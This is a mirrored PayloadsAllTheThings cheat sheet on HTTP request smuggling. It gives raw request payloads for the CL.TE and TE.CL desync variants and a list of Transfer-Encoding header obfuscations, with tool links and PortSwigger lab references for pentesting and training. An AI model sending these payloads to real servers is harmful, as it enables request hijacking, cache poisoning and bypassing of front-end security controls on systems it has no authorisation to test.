mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
119 lines
4.0 KiB
Markdown
119 lines
4.0 KiB
Markdown
# Request Smuggling
|
|
|
|
## Summary
|
|
|
|
* [Tools](#tools)
|
|
* [CL.TE vulnerabilities](#cl.te-vulnerabilities)
|
|
* [TE.CL vulnerabilities](#te.cl-vulnerabilities)
|
|
* [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header)
|
|
* [References](#references)
|
|
|
|
## Tools
|
|
|
|
* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)
|
|
* [Smuggler](https://github.com/defparam/smuggler)
|
|
* [Simple HTTP Smuggler Generator CL.TE TE.CL](https://github.com/dhmosfunk/simple-http-smuggler-generator) > this tool does not offer automated exploitation. You have to identify the injection point and exploit it manually!
|
|
|
|
|
|
## About CL.TE | TE.CL Vulnerabilities
|
|
If you want to exploit HTTP Requests Smuggling manually you will face some problems especially in TE.CL vulnerability you have to calculate the chunk size for the second request(malicious request) as portswigger suggests `Manually fixing the length fields in request smuggling attacks can be tricky.`. For that reason you can use the [Simple HTTP Smuggler Generator CL.TE TE.CL](https://github.com/dhmosfunk/simple-http-smuggler-generator) and exploit the CL.TE TE.CL vulnerabilities manually and learn how this vulnerability works and how you can exploit it. This tool offers you only the second request with a valid chunk size(TE.CL) auto-generated but does not offer automated exploitation. You have to identify the injection point and exploit it manually!
|
|
|
|
|
|
|
|
|
|
|
|
## CL.TE vulnerabilities
|
|
|
|
> The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.
|
|
|
|
```powershell
|
|
POST / HTTP/1.1
|
|
Host: vulnerable-website.com
|
|
Content-Length: 13
|
|
Transfer-Encoding: chunked
|
|
|
|
0
|
|
|
|
SMUGGLED
|
|
```
|
|
|
|
Example:
|
|
|
|
```powershell
|
|
POST / HTTP/1.1
|
|
Host: domain.example.com
|
|
Connection: keep-alive
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 6
|
|
Transfer-Encoding: chunked
|
|
|
|
0
|
|
|
|
G
|
|
```
|
|
|
|
Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
|
|
|
|
## TE.CL vulnerabilities
|
|
|
|
> The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.
|
|
|
|
```powershell
|
|
POST / HTTP/1.1
|
|
Host: vulnerable-website.com
|
|
Content-Length: 3
|
|
Transfer-Encoding: chunked
|
|
|
|
8
|
|
SMUGGLED
|
|
0
|
|
```
|
|
|
|
Example:
|
|
|
|
```powershell
|
|
POST / HTTP/1.1
|
|
Host: domain.example.com
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86
|
|
Content-Length: 4
|
|
Connection: close
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
5c
|
|
GPOST / HTTP/1.1
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 15
|
|
x=1
|
|
0
|
|
|
|
|
|
```
|
|
|
|
:warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.You need to include the trailing sequence \r\n\r\n following the final 0.
|
|
|
|
Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
|
|
|
|
## TE.TE behavior: obfuscating the TE header
|
|
|
|
> The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.
|
|
|
|
```powershell
|
|
Transfer-Encoding: xchunked
|
|
Transfer-Encoding : chunked
|
|
Transfer-Encoding: chunked
|
|
Transfer-Encoding: x
|
|
Transfer-Encoding:[tab]chunked
|
|
[space]Transfer-Encoding: chunked
|
|
X: X[\n]Transfer-Encoding: chunked
|
|
Transfer-Encoding
|
|
: chunked
|
|
```
|
|
|
|
Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
|
|
|
|
## References
|
|
|
|
* [PortSwigger - Request Smuggling Tutorial](https://portswigger.net/web-security/request-smuggling) and [PortSwigger - Request Smuggling Reborn](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)
|
|
* [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0)
|